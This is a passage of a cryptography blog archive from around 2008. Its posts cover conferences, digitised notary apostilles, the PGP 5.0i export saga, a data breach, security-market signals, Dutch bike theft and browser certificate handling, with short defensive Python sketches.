    Conferences can help; but I feel it is far too easy to fall into the standard conference models. Top-quality names aimed at top-paying attendees, blindness born of presumptions about audience and presenters (e.g., academic or corporate): these are the familiar complaints.

    Another complaint is that so much of the value of conferences happens when the "present" button is set to "off". And that leads to a sort of obvious conclusion, in that the attendees don't so much want to hear about your discoveries, rather, what they really want is to develop solutions to their own problems. FC solved this in a novel way by having the conference in the Caribbean and other tourist/financial settings. This lucky choice of a pleasant holiday environment, and the custom of morning papers leaving afternoons freer made for a lot of lively discussion.

    There are other models. I experimented at EFCE, which Rachel, Fearghas and I ran a few years back in Edinburgh. My call (and I had to defend my corner on this one) was that the real attendees were the presenters. If you could present to peers who would later on present to you, then we could also more easily turn off the button and start swapping notes. If we could make an entire workshop of peers, then structure would not be imposed, and relationships could potentially form naturally and evolve without so many prejudices.

    Which brings us to yesterday's event: BarCampBankLondon. What makes this bash unusual is that it is a meeting of peers (like EFCE), there is a cross-discipline focus (finance and computing, balanced with some legal and consulting people) and there isn't much of an agenda or a selection process (unlike EFCE). Addendum: James Gardner suggests that other conferences are dead, in the face of BarCamp's model.

    I'm all for experimentation, and BCBL seemed to manage the leading and focussing issue with only the lightest of touches. What is perhaps even more indicative of the (this?) process was that it was only 10 quid to get in, but you consume your Saturday on un-paid time. Which is a great discriminator: those who will sacrifice to work this issue turned up, and those looking for an easy, paid way to skive off work did not.

    So, perhaps an ideal format would be a BarCamp coupled with the routine presentations? Instead of a panel session (which I find a bit fruitless) replace one afternoon with a free-for-all? This is also quite similar to the "rump sessions" that are favoured in the cryptography world. Something to think about when you are running your next conference.

    Posted by iang at 05:54 PM | Comments (2) | TrackBack

    June 30, 2008

    Cross-border Notarisations and Digital Signatures

    My notes of a presentation by Dr Ugo Bechini at the Int. Conf. on Digital Evidence, London. As it touches on many chords, I've typed it up for the blog:

    The European or Civil Law Notary is a powerful agent in commerce in the civil law countries, providing a trusted control of a high value transaction. Often, this check is in the form of an Apostille which is (loosely) a stamp by the Notary on an official document that asserts that the document is indeed official. Although it sounds simple, and similar to common law Notaries Public, behind the simple signature is a weighty process that may be used for real estate, wills, etc.

    It works, and as Eliana Morandi puts it, writing in the 2007 edition of the Digital Evidence and Electronic Signature Law Review:

    Clear evidence of these risks can be seen in the very rapid escalation, in common law countries, of criminal phenomena that are almost unheard of in civil law countries, at least in the sectors where notaries are involved. The phenomena related to mortgage fraud is particularly important, which the Mortgage Bankers Association estimates to have caused the American system losses of 2.5 trillion dollars in 2005.

    OK, so that latter number came from Choicepoint's "research" (referenced somewhere here) but we can probably agree that the grains of truth sum to many billions.

    Back to the Notaries. The task that they see ahead of them is to digitise the Apostille, which to some simplification is seen as a small text with a (dig)sig, which they have tried and tested. One lament common in all European tech adventures is that the Notaries, split along national lines, use many different systems: 7 formats indicating at least 7 different software packages, frequent upgrades, and of course, ultimately, incompatibility across the Eurozone.

    To make notary documents interchangeable, there are (posits Dr Bechini) two solutions:

    1. a single homogenous solution for digsigs; he calls this the "GSM" solution, whereas I thought of it as a potential new "directive failure".
    2. a translation platform; one-stop shop for all formats

    A commercial alternative was notably absent. Either way, IVTF (or CNUE) has adopted and built the second solution: a website where documents can be uploaded and checked for digsigs; the system checks the signature, the certificate and the authority and translates the results into 4 metrics:

    • Signed - whether the digsig is mathematically sound
    • Unrevoked - whether the certificate has been reported compromised
    • Unexpired - whether the certificate is out of date
    • Is a notary - the signer is part of a recognised network of TTPs

    In the IVTF circle, a notary can take full responsibility for a document from another notary when there are 4 green boxes above, meaning that all 4 things check out.
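
    A minimal sketch of what those four green boxes amount to, in Python; the function name, the plain-set stand-ins for CRLs and the notarial directories, and the RSA assumption are all mine, not IVTF's:

        # Sketch only: the four IVTF-style checks, using the Python `cryptography`
        # package for the signature and expiry parts, with plain sets standing in
        # for what would really be CRLs and the notarial networks' own directories.
        from datetime import datetime
        from cryptography import x509
        from cryptography.hazmat.primitives import hashes
        from cryptography.hazmat.primitives.asymmetric import padding

        def check_apostille(document: bytes, signature: bytes, cert_pem: bytes,
                            revoked_serials: set, notary_issuers: set) -> dict:
            cert = x509.load_pem_x509_certificate(cert_pem)
            results = {}

            # 1. Signed: is the digsig mathematically sound over this document?
            #    (RSA with PKCS#1 v1.5 padding is assumed here.)
            try:
                cert.public_key().verify(signature, document,
                                         padding.PKCS1v15(), hashes.SHA256())
                results["signed"] = True
            except Exception:
                results["signed"] = False

            # 2. Unrevoked: has the certificate been reported compromised?
            results["unrevoked"] = cert.serial_number not in revoked_serials

            # 3. Unexpired: is the certificate still within its validity period?
            results["unexpired"] = datetime.utcnow() <= cert.not_valid_after

            # 4. Is a notary: does the issuer belong to a recognised network of TTPs?
            results["is_a_notary"] = cert.issuer.rfc4514_string() in notary_issuers

            return results

    Four green boxes is then simply all(check_apostille(...).values()) coming back True.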

    This seems to be working: Notaries are now big users of digsigs, 3 million this year. This is balanced by some downsides: although they cover 4 countries (Deutschland, España, France, Italy), every additional country creates additional complexity.

    Question is (and I asked), what happens when an expired or revoked certificate causes a yellow or red warning?

    The answer was surprising: the certificates are replaced 6 months before expiry, and the messages themselves are sent and checked on a timescale of a few hours. So, instead of the document being archived with digsig and then shared, a relying Notary goes back to the originating Notary to request a new copy. The originating Notary goes to his national repository, picks up his *original* which was registered when the document was created, adds a fresh new digsig, and forwards it. The relying notary checks the fresh signature and moves on to her other tasks.
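
    As a toy, the flow reads something like this; every name below is my own invention, Ed25519 from the Python `cryptography` package stands in for whatever the real systems use, and the national registry is reduced to a dict:

        # Toy of the re-request flow: the originating notary keeps the registered
        # original and issues a fresh, short-lived digsig each time a relying
        # notary asks.
        from dataclasses import dataclass
        from cryptography.hazmat.primitives.asymmetric import ed25519

        @dataclass
        class FreshCopy:
            document: bytes
            signature: bytes

        class OriginatingNotary:
            def __init__(self, national_repository: dict):
                self.repository = national_repository
                self.key = ed25519.Ed25519PrivateKey.generate()  # current signing key

            def reissue(self, doc_id: str) -> FreshCopy:
                original = self.repository[doc_id]                   # the *original*
                return FreshCopy(original, self.key.sign(original))  # fresh digsig

        def relying_notary_check(copy: FreshCopy, originator: OriginatingNotary) -> bytes:
            # raises InvalidSignature if the fresh digsig does not check out;
            # in reality the relying notary holds only the public key, of course
            originator.key.public_key().verify(copy.signature, copy.document)
            return copy.document

        # usage:
        notary = OriginatingNotary({"deed-42": b"...the registered deed..."})
        deed = relying_notary_check(notary.reissue("deed-42"), notary)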

    You can probably see where we are going here. This isn't digital signing of documents, as it was envisaged by the champions of same, it is more like real-time authentication. On the other hand, it does speak to that hypothesis of secure protocol design that suggests you have to get into the soul of your application: Notaries already have a secure way to archive the documents, what they need is a secure way to transmit that confidence on request, to another Notary. There is no problem with short term throw-away signatures, and once we get used to the idea, we can see that it works.

    One closing thought I had was the sensitivity of the national registry. I started this post by commenting on the powerful position that notaries hold in European commerce, the presenter closed by saying "and we want to maintain that position." It doesn't require a PhD to spot the disintermediation problem here, so it will be interesting to see how far this goes.

    A second closing thought is that Morandi cites

    ... the work of economist Hernando de Soto, who has pointed out that a major obstacle to growth in many developing countries is the absence of efficient financial markets that allow people to transform property, first and foremost real estate, into financial capital. The problem, according to de Soto, lies not in the inadequacy of resources (which de Soto estimates at approximately 9.34 trillion dollars) but rather in the absence of a formal, public system for registering property rights that are guaranteed by the state in some way, and which allows owners to use property as collateral to obtain access to the financial capital associated with ownership.

    But, Latin America, where de Soto did much of his work, follows the Civil Notary system! There is an unanswered question here. It didn't work for them, so either the European Notaries are wrong in their assertion that this is the reason there is no fraud in this area, or de Soto is wrong in his assertion as above. Or?

    Posted by iang at 08:02 AM | Comments (1) | TrackBack

    June 17, 2008

    Digital Evidence -- 26-27 June, London

    Cryptographers, software and hardware architects and others in the tech world have developed a strong belief that everything can be solved with more bits and bytes. Often to our benefit, but sometimes to our cost. Just so with matters of law and disputes, where inventions like digital signatures have laid a trail of havoc and confusion through security practices and tools. As we know in financial cryptography, public-key reverse encryptions -- confusingly labelled as digital signatures -- are more usefully examined within the context of the law of evidence than within that of signatures.

    Now here cometh those who have to take these legal theories from the back of the technologists' napkins and make them really work: the lawyers. Stephen Mason leads an impressive line-up from many countries in a conference on Digital Evidence:

    Digital evidence is ubiquitous, and to such an extent, that it is used in courts every day in criminal, family, maritime, banking, contract, planning and a range of other legal matters. It will not be long before the only evidence before most courts across the globe will all be in the form of digital evidence: photographs taken from mobile telephones, e-mails from Blackberries and laptops, and videos showing criminal behaviour on You Tube are just some of the examples. Now is the time for judges, lawyers and in-house counsel to understand (i) that they need to know some of the issues and (ii) they cannot ignore digital evidence, because the courts deal with it every day, and the amount will increase as time goes by. The aim of the conference will be to alert judges, lawyers (in-house lawyers as well as lawyers in practice), digital forensic specialists, police officers and IT directors responsible for conducting investigations to the issues that surround digital evidence.

    Not digital signatures, but evidence! This is a genuinely welcome development, and well worth the visit. Here's more of the blurb:

    Conference Programme International Conference on Digital Evidence

    26th- 27th June 2008, The Vintner's Hall, London – UNITED KINGDOM
    Conference: 26th & 27th June 2008, Vintners' Hall, London
    Cocktail & Dinner: 26th June 2008, The Honourable Society of Gray's Inn

    THE FIRST CONFERENCE TO TREAT DIGITAL EVIDENCE FULLY ON AN INTERNATIONAL PLATFORM...

    12 CPD HOURS - ACCREDITED BY THE LAW SOCIETY & THE BAR STANDARDS BOARD
    This event has also been accredited on an ad hoc basis under the Faculty's CPD Scheme and will qualify for 12 hours

    Understanding the Technology: Best Practice & Principles for Judges, Lawyers, Litigants, the Accused & Information Security & Digital Evidence Specialists

    MIS is hosting & developing this event in partnership with & under the guidance of Stephen Mason, Barrister & Visiting Research Fellow, Digital Evidence Research, British Institute of International and Comparative Law.
    Mr. Mason is in charge of the programme's content and is the author of Electronic Signatures in Law (Tottel, 2nd edn, 2007) [This text covers 98 jurisdictions including case law from Argentina, Australia, Brazil, Canada, China, Colombia, Czech Republic, Denmark, Dominican Republic, England & Wales, Estonia, Finland, France, Germany, Greece, Hungary, Israel, Italy, Lithuania, Netherlands, Papua New Guinea, Poland, Portugal, Singapore, South Africa, Spain, Switzerland and the United States of America]. He is also an author and general editor of Electronic Evidence: Disclosure, Discovery & Admissibility (LexisNexis Butterworths, 2007) [This text covers the following jurisdictions: Australia, Canada, England & Wales, Hong Kong, India, Ireland, New Zealand, Scotland, Singapore, South Africa and the United States of America]. Register Now!

    Stephen is also International Electronic Evidence, general editor, (British Institute of International and Comparative Law, 2008), ISBN 978-1-905221-29-5, covering the following jurisdictions: Argentina, Austria, Belgium, Bulgaria, Croatia, Cyprus, Czech Republic, Denmark, Egypt, Estonia, Finland, France, Germany, Greece, Hungary, Iceland, Italy, Japan, Latvia, Lithuania, Luxembourg, Malta, Mexico, Netherlands, Norway, Poland, Romania, Russia, Slovakia, Slovenia, Spain, Sweden, Switzerland, Thailand and Turkey.

    Posted by iang at 09:46 AM | Comments (2) | TrackBack

    Historical copy of PGP 5.0i for sale -- reminder of the war we lost

    Back in the 1990s, a group called the cypherpunks waged the crypto wars with the US government. They wanted easy access to crypto, the US government didn't want them to have it. RAH points to Sameer's blog:

    The solution for my company, C2Net Software, Inc., was to develop an offshore development team and have them develop the software there. Other companies developed different strategies. Most opted to sell broken products to their overseas customers. One other company cared about the security of their customers. That company was PGP.

    PGP chose a different strategy however. They published their source code as a book. The book was then exported, the contents of that book were then scanned in, and then a completely legal international version of PGP was born.

    Sameer is selling his copy of PGP 5.0i, the book that was printed in the USA and exported in boxes to the international scanning project.

    PGP 5.0i, on the other hand, was compiled from source code that was printed in a book (well, actually 12 books - over 6000 pages!). The books were exported from the USA in accordance with the US Export Regulations, and the pages were then scanned and OCRed to make the source available in electronic form.

    This was not an easy task. More than 70 people from all over Europe worked for over 1000 hours to make the PGP 5.0i release possible. But it was worth it. PGP 5.0i was the first PGP version that is 100% legal to use outside the USA, because no source code was exported in electronic form.


    The last 1% was done at HIP 1997, or hacking-in-progress, a Dutch open-air festival conducted once every 4 years. (You can see an early attempt at blogging here and here and a 2004 post.)

    Lucky Green turned up with a box and ... left it lying around, at which point the blogging stopped and the work started. A team of non-Americans then spent around 2 days working through the last, unscanned and broken pages. There were about 20 at the peak, working in teams of 2 and 3 across all of HIP, swapping their completed files back at the cypherpunks tent. Somewhere around is a photo of the last file being worked through, with three well-known hackers on one keyboard.

    It was uploaded around 3 in the morning, Sunday if I recall, as the party was winding down; some brave souls waited around for the confirmed download, but by 5am, only Sameer was still up and willing to download and compile a first international PGP 5.0.

    The story has a sad ending. In the last months of 1999, the US government released the controls on exporting free and open cryptography. Hailed by all as a defeat, it was really a tactical withdrawal from ground that wasn't sustainable. The cypherpunks lost more: with the departure of their clear enemy, they dispersed over time, and we emerging security and financial cryptography entrepreneurs lost our coolness factor and ready supply of cryptoplumbers. Lots of crypto projects migrated back to the US, where control was found by other means. The industry drifted back to insecure-practice-by-fiat. Buyers stopped being aware of security, and they were set up for the next failure and the next and the next...

    Strategic victory went to the US government, which still maintains a policy of keeping the Internet insecure by suppressing crypto where and when it can. Something to remember if you ever get offered a nice public relations job in the DHS, or if you ever get phished.

    Posted by iang at 03:39 AM | Comments (6) | TrackBack

    May 10, 2008

    The Italian Job: highlights the gap between indirect and direct damage

    If you've been following the story of the Internet and Information Security, by now you will have worked out that there are two common classes of damage that are done when data is breached: The direct damage to the individual victims and the scandal damage to the organisation victim when the media get hold of it. From the Economist:

    Illustration by Peter Schrank

    ... Italians had learnt, to their varying dismay, amusement and fascination, that—without warning or consultation with the data-protection authority—the tax authorities had put all 38.5m tax returns for 2005 up on the internet. The site was promptly jammed by the volume of hits. Before being blacked out at the insistence of data protectors, vast amounts of data were downloaded, posted to other sites or, as eBay found, burned on to disks.

    The uproar in families and workplaces caused by the revelation of people's incomes (or, rather, declared incomes) can only be guessed at. A society aristocrat, returning from St Tropez, found himself explaining to the media how he financed a gilded lifestyle on earnings of just €32,043 ($47,423). He said he had generous friends.

    ...Vincenzo Visco, who was responsible for stamping out tax dodging, said it promoted “transparency and democracy”. Since the 1970s, tax returns have been sent to town halls where they can be seen by the public (which is how incomes of public figures reach the media). Officials say blandly that they were merely following government guidelines to encourage the use of the internet as a means of communication.

    The data-protection authority disagreed. On May 6th it ruled that releasing tax returns into cyberspace was “illicit”, and qualitatively different from making them available in paper form. It could lead to the preparation of lists containing falsified data and meant the information would remain available for longer than the 12 months fixed by law.

    The affair may not end there. A prosecutor is investigating if the law has been broken. And a consumer association is seeking damages. It suggests €520 per taxpayer would be appropriate compensation for the unsolicited exposure.

    An insight of the 'silver bullets' approach to the market is that these damages should be considered separately, not lumped together. The one that is the biggest cost will dominate the solution, and if the two damages suggest opposing solutions, the result may be at the expense of the weaker side.

    What makes Information Security so difficult is that the public scandal part of the damage (the indirect component) is generally the greater damage. Hence, breaches have been classically hushed up, and the direct damages to the consumers are untreated. In this market, then, the driving force is avoiding the scandal, which not only means that direct damage to the consumer is ignored, it is likely made worse.

    We then see more evidence of the (rare) wisdom of breach disclosure laws, even if, in this case, the breach was a disclosure by intention. The legal action mentioned above puts a number on the direct damage to the consumer victim. We may not agree with €520, but it's a number and a starting position that is only possible because the breach is fully out in the open.

    Those then that oppose stronger breach laws, or wish to insert various weasel words such as "you're cool to keep it hush-hush if you encrypted the data with ROT13" should ask themselves this: is it reasonable to reduce the indirect damage of adverse publicity at the expense of making direct damages to the consumer even worse?

    Lots of discussion, etc etc blah blah. My thought is this: we need to get ourselves to a point, as a society, where we do not turn the organisation into more of a secondary victim than it already is through its breach. We need to not make matters worse; we should work to remove the incentives to secrecy, rather than counterbalancing them with opposing and negative incentives such as heavy-handed data protection regulators. If there is any vestige of professionalism in the industry, then this is one way to show it: let's close down the paparazzi school of infosec and encourage and reward companies for sharing their breaches in the open.

    Posted by iang at 10:24 AM | Comments (2) | TrackBack

    April 20, 2008

    The Medium is the Message: what is the message of security today?

    Who said that? Was it Andy Warhol or Marshall McLuhan or Maurice Saatchi?

    A few days ago, we reflected on the medium of the RSA conference, and how the message has lost its shine. One question is how to put the shine back on it, but another question is, why do we want shine on the conference? As Ping mused on, what is the message in the first place?

    The medium is the message. Here's an example that I stumbled across today: Neighbours. If you don't know what that is, have a look at wikipedia. Take a few moments to skim through the long entry there ...

    If you didn't know what it was before, do you know now? Wikipedia tells us about the popularity, the participants, the ratings, the revamps, the locations, the history of the success, the theme tune, and the awards. Other than these brief lines at the beginning:

    Neighbours is a long-running Australian soap opera. The series follows the daily lives of several families who live in the six houses at the end of Ramsay Street, a quiet cul-de-sac in the fictional middle-class suburb of Erinsborough. Storylines explore the romances, family problems, domestic squabbles, and other key life events affecting the various residents.

    Wikipedia does not tell the reader what Neighbours is. There are 5998 words in the article, and 55 words in that message above. If we were being academic, we could call them message type I and type II and note that there is a ratio of 100 to 1 between them!

    At a superficial, user-based level, the 55 words above are the important message. To me and you, that is. But, to whoever wrote that article, the other 99% is clearly the most important. Their words are about the medium, not what we outsiders would have called the message, and it is here that the medium has become the message.

    Some of that stuff *is* important. If we drag through the entire article we find that the TV show draws a daily audience of one million in Australia, peaked at 18 million in the UK, and other countries had their times too. That you can take to the bank; advertisers will line up out on the street to buy that.

    We can also accurately measure the cost and therefore benefit to consumers: 30 minutes each working day. So we know, objectively, that this entertainment is worth 30 minutes of prime time for the viewers. (The concept of a soap opera guarantees repeat business, so you know you are also targeting a consistent set of people, consistently.)

    We can then conclude that, on the buy side and the sell side of this product, we have some sort of objective meeting of the minds. And, we can compress this mind meeting into a single number called ratings. Based on that one number alone, we can trade.

    That number, patient reader, is a metric. A metric is something that is objectively important to both buyer and seller. It's Okay that we don't know what "it" is, as long as we have the metric of it. In television, the medium is the message, and that's cool.

    Now, if we turn back to the RSA channel .. er .. conference, we can find similar numbers: In 2007, 17,000 attendees and 340 exhibitors. Which is bankable, you can definitely get funding for that, so that conference is in good shape. On the sell side, all is grand.

    However, as the recent blog thread pointed out, on the buy side, there is a worrying shortage of greatness: the message was, variously, buyers can't understand the products, buyers think the products are crap, buyers don't know why they're there, and buyers aren't buying.

    In short, buyers aren't, anymore. And this separates Neighbours from RSA in a way that is extremely subtle. When I watch an episode of Neighbours, my presence is significant in and of itself because the advertising works on a presence & repeat basis. I'm either entertained and come back tomorrow, or I stop watching, so entertainment is sufficient to make the trade work.

    However, if I go to the RSA conference, the issue of my *presence* isn't the key. Straight advertising isn't the point here, so something other than my presence is needed.

    What is important is that the exhibitors sell something. Marketing cannot count on presence alone because the buyer is not given that opportunity statistically (1 buyer, 340 exhibitors, zero chance of seeing all the adverts) so something else has to serve as the critical measurement of success.

    Recent blog postings suggest it is sales. Whatever it is, we haven't got that measurement. What we do have is exhibitors and participants, but because these numbers fail to have relevance to both sides of the buy-sell divide, they fail to be metrics.

    Which places RSA in a different space to Neighbours. Readers will recognise the frequent theme of security being in the market for silver bullets, and that the numbers of exhibitors and participants are therefore signals, not metrics.

    And, in this space, when the medium becomes the message, that's very uncool, because we are now looking at a number that doesn't speak to sales. When Marshall McLuhan coined his phrase, he was speaking generally positively about electronic media such as TV, but we can interpret this in security more as a warning: In a market based on signals not metrics, when the signals become the system, when the medium becomes the message, it is inevitable that the system will collapse, because it is no longer founded on objective needs.

    Signals do not by definition capture enough of the perfect quality that is needed, they only proxy it in some uncertain and unreliable sense. Which is fine, if we all understand this. To extend Spence's example, if we know that a degree in Computer Science is not a guarantee that the guy can program a computer, that's cool.

    Or, to put it another way: there are no good signals, only less bad ones. The signal is less bad than the alternative, which is nothing. Which leads us to the hypothesis that the market will derail when we act as if the signal is a metric, as if the Bachelor's in CompSci is a certification of programming skill, as if booth size is the quality of security.

    Have another look at Neighbours. It's still going on after 22 years or so. The audience is around one million, because of some revamp. That metric is still being taken to the bank. The viewer is entertained, the advertiser markets. Buyer and seller are comfortable; the message and the medium therefore are in happy coincidence, they can happily live together because the medium lives on solid metrics. All of this, and we still don't know what it is. That's TV.

    Whereas with the world of security, we know that the signal of the RSA conference is as strong as ever, but we also know that, in this very sector that the conference has become the iconic symbol for, the wheels are coming off. And, what's even more disturbing, we know that the RSA conference will go from strength to strength, even as the wheels are spinning out of view, and we the users are sliding closer to the proverbial cliff.

    I know the patient reader is desperate to find out what Neighbours really is, so here goes. Read the following with an Aussie sense of humour:

    About 10 years back I and a partner flew to Prague and then caught a train to a Czech town near the Polish border, in a then-devastated coal belt. We were to consult to a privatised company that was once the Ministry of Mines. Recalling communist times, the Ministry had shrunk from many hundreds of thousands of miners down to around 20,000 at that time.

    Of which, only 2 people spoke English. These two English speakers, both of them, picked us up at the train station. As we drove off, the girl of the pair started talking to us, and her accent immediately jolted us out of our 24 hours travel stupor: Australian! Which was kind of unexpected in such a remote place, off the beaten track, as they say down under.

    I looked slowly at my friend, who was Scandinavian. He looked at me, slowly. Okay, so there's a story here, we thought... Then, searching for the cautious approach, we tried to figure it out:

    "How long have you lived here?" I asked.

    She looked back at me, with worry in her face. "All ma life. Ah'm Czech." In pure, honest dinkum Strine, if you know what that means.

    "No, you're not, you're Aussie!"

    "I'm Czech! I kid you not!"

    "Okay...." I asked slowly, "then why do you have an Australian accent."

    Nothing, except more worry on her face. "Where did you learn English?"

    This she answered: "London. I did a couple of years' Uni there."

    "But you don't have an English accent. Where did you pick up an Australian accent?"

    "Promise you won't laugh?" We both duly promised her we would not laugh, which was easy, as we were both too tired to find anything funny any more.

    "Well," she went on, "I was s'posed to do English at Uni but I didn't." That is, she did not attend the University's language classes.

    "Instead, I stayed at home and watched Neighbours every lunchtime!"

    Of course, we both cracked up and laughed until she was almost in tears.

    That's what Neighbours is -- a cultural phenomenon that swept through Britain by presenting an idyllic image of a sunny, happy place in a country far far away. Lots of fun people, lots of sunshine, lots of colour, lots of simple dramas, albeit all in that funny Aussie drawl. A phenomenon strong enough that, in an unfair competition of 22 minutes, squeezed between daily life on the streets of the most cosmopolitan city in the world, it was able to imprint itself on the student visitor, and totally dominate the maturing of her language. The result was perfect English, yet with no trace of the society in which she lived.

    But you won't read that in Wikipedia, because, for the world of TV, the medium is the message, and they have a metric. They only care that she watched, not what it did to her. And, in the converse, the language student got what she wanted, and didn't care what they thought about that.

    Posted by iang at 05:30 PM | Comments (1) | TrackBack

    April 19, 2008

    The illusion of Urban Legends - the Dutch Revolving Bicycle Cycle

    Chandler spots a post by Michael on those pervasively two-wheeled Dutch, who all share one standard beaten-up old bike model, apparently mass-produced in a beaten-up old bike factory.

    The Dutch are also prosperous, and they have a strong engineering and technology culture, so I was surprised on two visits in the last few years to see that their bikes are all junkers: poorly maintained, old, heavy, three-speeds. The word I used was all. ...

    I asked about this and everyone immediately said "if you had a good bike it would be immediately stolen." On reflection, I'm not satisfied with the answer, for a couple of reasons. First, the Dutch are about as law-abiding as Americans, perhaps more. Second, the serious lock that has kept my pretty good bikes secure on sketchy streets in two US cities for decades is available for purchase all over the world.

    Third, and most important, I don't see how this belief could be justified by real data, because there were absolutely no bikes worth stealing anywhere I looked. ...

    Right. So here's an interesting case of an apparently irreconcilable conundrum. Why does all the evidence suggest that bike insecurity is an improbability, yet we all believe it to be pervasive? Let's tear this down, because there are striking parallels between Michael's topic and the current debate on security. (Disclosure: like half of all good FCers, I've spent some time on Amsterdam wheels, but it is a decade or so back.)

    At least, back then, I can confirm that bicycle theft was an endemic problem. I can't swear to any figures, but I recall this: average lifespan of a new bike was around 3 months (then it becomes someone else's old bike). I do recall frequent discussions about a German friend who lost her bike, stolen, several times, and had to go down to the known areas where she could buy another standard beat-up bike from some shady character. Two or three times per year, and I was even press-ganged into riding shotgun once, so I have some first-hand evidence that she wasn't secretly building a bike out of spare parts she had in her handbag. Back then, the going price was around 25-50 guilders (hazy memory) which would be 10-30 euros. Anyone know the price at the moment?

    For the most part, I used inline skates. However when I did some small job somewhere (for an FC connection), I was faced with the issue. Get a bike, lose it! As a non-native, I lacked the bicycle-loss-anti-angst-gene, so I was emotionally constrained from buying the black rattler. I faced and defeated the demon with a secret weapon, the Brompton!

    The Dutch being law-abiding: well, this is just plain wrong. The Dutch are very upright, but that doesn't mean they aren't human. Law-abiding is an economic issue, not an absolute. IMO, there is no such thing as a region where everyone abides by the law, there are just regions where they share peculiarities in their attitudes about the law. For tourists, there are stereotypes, but the wise FCer gnaws at the illusion until the darker side of economic reality and humanity is revealed. It's fun, because without getting into the character of the people, you can't design FC systems for them!

    As it turns out, there is even a casual political term for this duality: the Dutch Compromise describes their famous ability to pass a law to appease one group of people, and then ignore it totally to appease another. A rather well-known example: it is technically illegal to trade in drugs and prostitution, yet for the latter, you are allowed to display your own wares in your own window. To see it in action, look around for a concentration of red lights in the windows.

    Final trick: when they buy a new bike (as new stock has to be inserted into the population of rotating wheels), the wise Dutch commuter will spend a few hours making it look old and tatty. Disguise is a skill, which may explain the superficial observation that no bicycle is worth stealing.

    What I don't know: why the trade persists. One factor that may explain this is that enough of the Dutch will buy a stolen bike to make it work. I also asked about this, and recall discussions where very upright, very "law-abiding" citizens did indeed admit to buying stolen wheels. So the mental picture here is of a rental or loaning system, and as a society, they haven't got it together to escape their cyclical prisoner's dilemma.

    Also: are bike locks totally secure? About as secure as crypto, I'd say. Secure when it works, a broken bucket of worthless bits when it doesn't. But let's hear from others?

    Addendum: citybikes are another curiosity. Adam reports that they are now being tried in the US.

    Posted by iang at 05:59 AM | Comments (5) | TrackBack

    April 17, 2008

    Browser news: Fake subpoenas, the OODA waltz, and baby steps on the client side

    Phishing still works, says Verisign:

    ...these latest messages masquerade as an official subpoena requiring the recipient to appear before a federal grand jury. The emails correctly address CEOs and other high-ranking executives by their full name and include their phone number and company name, according to Matt Richard, director of rapid response at iDefense, a division of VeriSign that helps protect financial institutions from fraud. ...

    About 2,000 executives took the bait on Monday, and an additional 70 have fallen for the latest scam, Richard said. Operating under the assumption that as many as 10 percent of recipients fell for the ruse, he estimated that 21,000 executives may have received the email. Only eight of the top 35 anti-virus products detected the malware on Monday, and on Wednesday, only 11 programs were flagging the new payload, which has been modified to further evade being caught.

    I find 10% to be exceptionally large, but, OK, it's a number, and we collect numbers!

    Disclosure for them: Verisign sells an anti-phishing technology called secure browsing, or at least the certificates part of that. (Hence they and you are interested in phishing statistics.) Due to problems in the browser interface, they and other CAs now also sell a "green" version called Extended Validation. This -- encouragingly -- fixes some problems with the older status quo, because more info is visible for users to assess risks (a statement by the CA, more or less). Less encouragingly, EV may trade future security for current benefit, because it further cements the institutional structure of secure browsing, meaning that as attackers spin faster in their OODA loops, browsers will spin slower around the attackers.

    Luckily, Johnath reports that further experiments are due in Firefox 3.1, so there is still some spinning going on:

    Here’s my initial list of the 3 things I care most about, what have I missed?

    1. Key Continuity Management

    Key continuity management is the name for an approach to SSL certificates that focuses more on “is this the same site I saw last time?” instead of “is this site presenting a cert from a trusted third party?” Those approaches don’t have to be mutually exclusive, and shouldn’t in our case, but supporting some version of this would let us deal more intelligently with crypto environments that don’t use CA-issued certificates.

    Johnath's description sells it short, perhaps for political reasons. KCM is useful when the user knows more than the CA, which unfortunately is most of the time. This might mean that the old solution should be thrown out in favour of KCM, but the challenge lies in extracting the user's knowledge in an efficacious way. As the goal with modern software is to never bother the user, this is much more of a challenge than might be first thought. Hence, as he suggests, KCM and CA-certified browsing will probably live side by side for some time.
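
    For the curious, a minimal key-continuity sketch in Python, nothing to do with Firefox's actual code; the cache file name is my own invention:

        # Remember the SHA-256 fingerprint of each site's certificate on first
        # contact, and flag any later change for the user (or the CA) to judge.
        import hashlib, json, os, ssl

        CACHE = os.path.expanduser("~/.kcm_cache.json")   # hypothetical cache file

        def cert_fingerprint(host: str, port: int = 443) -> str:
            pem = ssl.get_server_certificate((host, port))
            return hashlib.sha256(ssl.PEM_cert_to_DER_cert(pem)).hexdigest()

        def check_continuity(host: str) -> str:
            cache = json.load(open(CACHE)) if os.path.exists(CACHE) else {}
            seen, now = cache.get(host), cert_fingerprint(host)
            if seen is None:
                cache[host] = now
                with open(CACHE, "w") as f:
                    json.dump(cache, f)
                return "first sight: remembering this key"
            if seen == now:
                return "same key as last time"
            # a real client would now ask what the user knows before trusting it
            return "KEY CHANGED since last visit"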

    If there was a list of important security fixes for phishing, I'd say it should be this: UI fixes, KCM and TLS/SNI. Firefox is now covering all three of those bases. Curiously, Johnath goes on to say:

    The first is for me to get a better understanding of user certificates. In North America (outside of the military, at least) client certificates are not a regular matter of course for most users, but in other parts of the world, they are becoming downright commonplace. As I understand it, Belgium and Denmark already issue certs to their citizenry for government interaction, and I think Britain is considering its options as well. We’ve fixed some bugs in that UI in Firefox 3, but I think it’s still a second-class UI in terms of the attention it has gotten, and making it awesome would probably help a lot of users in the countries that use them. If you have experience and feedback here, I would welcome it.

    Certainly it is worthy of attention (although I'm surprised about the European situation) because they strictly dominate over username-passwords in such utterly scientific, fair and unbiased tests like the menace of the chocolate bar. More clearly, if you are worried about eavesdropping defeating your otherwise naked and vulnerable transactions, client-side private keys are the start of the way forward to proper financial cryptography.

    I've found x.509 client certificates easier to use than expected, but they are terribly hard to install into the browser. There are two real easy fixes for this: 1. allow the browser to generate a self-signed cert as a default, so we get more widespread use, and 2. create some sort of CA <--> browser protocol so that this interchange can happen with a button push. (Possibly 3., I suspect there may be some issues with SSL and client certs, but I keep getting that part wrong so I'll be vague this time!)
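
    On fix 1., the mechanics are the easy part. Here is a hedged sketch, using the Python `cryptography` package, of the kind of throwaway self-signed client cert a browser could mint by default; all names and lifetimes are illustrative:

        # Sketch: a throwaway self-signed client certificate.
        import datetime
        from cryptography import x509
        from cryptography.x509.oid import NameOID
        from cryptography.hazmat.primitives import hashes, serialization
        from cryptography.hazmat.primitives.asymmetric import rsa

        key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "self-signed client")])
        now = datetime.datetime.utcnow()

        cert = (
            x509.CertificateBuilder()
            .subject_name(name)               # self-signed: subject and issuer
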